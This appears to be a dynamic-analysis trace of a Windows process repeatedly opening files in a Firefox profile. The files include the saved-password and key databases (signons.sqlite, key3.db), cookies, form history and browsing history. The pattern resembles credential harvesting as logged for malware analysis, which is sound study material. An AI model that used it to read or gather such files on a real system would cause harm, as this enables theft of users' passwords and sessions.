Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\.metadata	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\.metadata	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\marionette.log	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\marionette.log	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\mimeTypes.rdf	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\mimeTypes.rdf	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\parent.lock	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\parent.lock	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\permissions.sqlite	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\permissions.sqlite	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\pluginreg.dat	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\pluginreg.dat	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\search.json	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\search.json	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\secmod.db	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\secmod.db	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.bak	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.bak	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.js	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.js	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	3	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\times.json	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\times.json	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\urlclassifierkey3.txt	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\urlclassifierkey3.txt	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webapps\webapps.json	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webapps\webapps.json	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webappsstore.sqlite	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webappsstore.sqlite	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Crash Reports\InstallTime20131025151332	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Crash Reports\InstallTime20131025151332	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\.metadata	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\.metadata	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\marionette.log	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\marionette.log	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\mimeTypes.rdf	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\mimeTypes.rdf	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\parent.lock	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\parent.lock	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\permissions.sqlite	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\permissions.sqlite	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\pluginreg.dat	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\pluginreg.dat	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\search.json	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\search.json	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\secmod.db	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\secmod.db	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.bak	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.bak	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.js	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.js	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\times.json	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\times.json	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\urlclassifierkey3.txt	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\urlclassifierkey3.txt	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webapps\webapps.json	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webapps\webapps.json	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webappsstore.sqlite	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webappsstore.sqlite	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\\profiles.ini	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\\profiles.ini	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\profiles.ini	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\.metadata	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\.metadata	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\marionette.log	desired_access = FILE_READ_ATTRIBUTES	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\marionette.log	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\mimeTypes.rdf	desired_access = FILE_READ_ATTRIBUTES	4	Fn
